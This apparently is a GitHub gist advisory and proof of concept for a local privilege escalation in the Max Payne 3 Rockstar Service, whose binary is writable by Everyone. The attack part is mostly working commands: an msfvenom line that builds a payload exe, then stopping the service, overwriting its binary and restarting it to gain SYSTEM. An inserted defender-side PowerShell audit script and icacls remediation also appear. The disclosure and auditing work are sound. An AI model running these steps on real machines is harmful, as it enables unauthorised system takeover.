
@ripp3rdoc
Last active April 2, 2024 15:49

Max Payne 3 is vulnerable to insecure file permissions, allowing a low-privilege user to overwrite the service binary and execute code as Administrator (NT Authority\SYSTEM).

Querying the 'Rockstar Service' configuration shows that the service binary path is "E:\XBox Games\MP3\RockstarService.exe":

C:\Program Files\Sysinternals>sc qc "Rockstar Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Rockstar Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "E:\XBox Games\MP3\RockstarService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Rockstar Game Library Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

By checking the file permissions, we can see that RockstarService.exe is world-readable and world-writable (RW for Everyone).

C:\Program Files\Sysinternals>accesschk.exe -accepteula "E:\XBox Games\MP3\RockstarService.exe"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

E:\XBox Games\MP3\RockstarService.exe
  RW Everyone
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
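As an added defender-side example (not part of the original gist), the PowerShell below enumerates every installed service, reads the ACL of its binary and reports any write-class right granted to a broad principal such as Everyone, which is exactly the condition accesschk exposed above. The principal list is an assumption to extend for your environment; the remediation path in the trailing comment is the one from the gist.

```powershell
# Added audit example (not from the original gist): list Windows services whose binary
# grants write-class rights to a broad principal, the condition accesschk exposed above.
# Run from an elevated prompt so every binary's ACL is readable.

# Principals every low-privilege user belongs to. Assumption: extend with your own groups.
$BroadPrincipals = @(
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'BUILTIN\Users'
)

# Any of these rights lets the holder replace the binary, or re-ACL it so that it can.
$Fsr = [System.Security.AccessControl.FileSystemRights]
$WriteClass = $Fsr::WriteData -bor $Fsr::AppendData -bor $Fsr::Delete -bor
              $Fsr::ChangePermissions -bor $Fsr::TakeOwnership -bor $Fsr::FullControl

function Get-ServiceBinaryPath([string]$PathName) {
    # Quoted path: everything inside the quotes.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted path (possibly containing spaces): up to the first .exe token.
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
    $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
    if (-not $acl) { continue }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteClass) -eq 0) { continue }
        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName      # LocalSystem here means SYSTEM-level impact
            Binary    = $exe
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
}
$findings | Format-Table -AutoSize

# Remediation for a flagged binary (path taken from the gist): drop inherited and explicit
# broad grants, leaving full control to SYSTEM/Administrators and read-execute to Users.
# icacls "E:\XBox Games\MP3\RockstarService.exe" /inheritance:r /remove:g Everyone
# icacls "E:\XBox Games\MP3\RockstarService.exe" /grant:r "NT AUTHORITY\SYSTEM:(F)" "BUILTIN\Administrators:(F)" "BUILTIN\Users:(RX)"
```

Check the containing directory's ACL as well: a principal who can delete or rename files in the folder can swap the binary even when the file itself is locked down.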

We can easily exploit this vulnerability by creating a malicious binary with MSFVenom and replacing RockstarService.exe with it, keeping the same file name.

┌──(Ripp3rdoc㉿hydra)-[~]
└─$ msfvenom -f exe -p windows/x64/exec CMD='C:\Windows\System32\cmd.exe'  -o RockstarService.exe
No encoder specified, outputting raw payload
Payload size: 295 bytes
Final size of exe file: 6656 bytes
Saved as: RockstarService.exe

Stop the service and overwrite the service file with your own.

C:\Program Files\Sysinternals>sc stop "Rockstar Service"

SERVICE_NAME: Rockstar Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
C:\Users\Ripp3rdoc\Downloads>copy "C:\Users\Ripp3rdoc\Downloads\RockstarService.exe" "E:\XBox Games\MP3\RockstarService.exe"
Overwrite E:\XBox Games\MP3\RockstarService.exe? (Yes/No/All): yes
        1 file(s) copied.

Finally, either start the game or run "Launcher.exe", and you'll gain admin privileges.

C:\Program Files\Sysinternals>sc start "Rockstar Service"

SERVICE_NAME: Rockstar Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 11540
        FLAGS              :

App/Game link: https://store.steampowered.com/app/204100/Max_Payne_3/
